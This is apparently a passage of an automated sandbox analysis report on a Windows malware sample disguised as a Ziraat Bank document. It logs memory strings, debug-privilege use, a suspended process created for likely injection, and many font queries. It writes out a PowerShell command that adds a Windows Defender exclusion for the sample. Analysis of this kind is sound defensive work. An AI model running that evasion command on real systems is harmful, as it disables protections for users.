Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd12ede91e4116<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcfc0bb3f6adf3
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce75dc8dac505
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0dae88b38925<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce24a674e955f
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf9ff7eb9cfd7
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd06ce01d0608b<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf2245aff2ed4
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd1898e07eb2d9<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2c1a7f74b2f8<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf17a3acb6994
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4153410722.0000000001586000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce902fceca989
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1739949343.0000000000A48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcef39c6ad8204
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd11117b97e492<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd30415be88eca<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2f544035f056<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce12ecfdbceae
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd03cc8c45aec3
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf1d37b977030
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd1165e66f96a5<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0d0d033d72a3<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd10bcc08ff78f<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2dc74955c8b5<
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd12ab3d99a9fe<
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3CE20 LdrInitializeThunk, 3_2_06F3CE20
Enables debug privileges
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe" Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe" Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process created: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
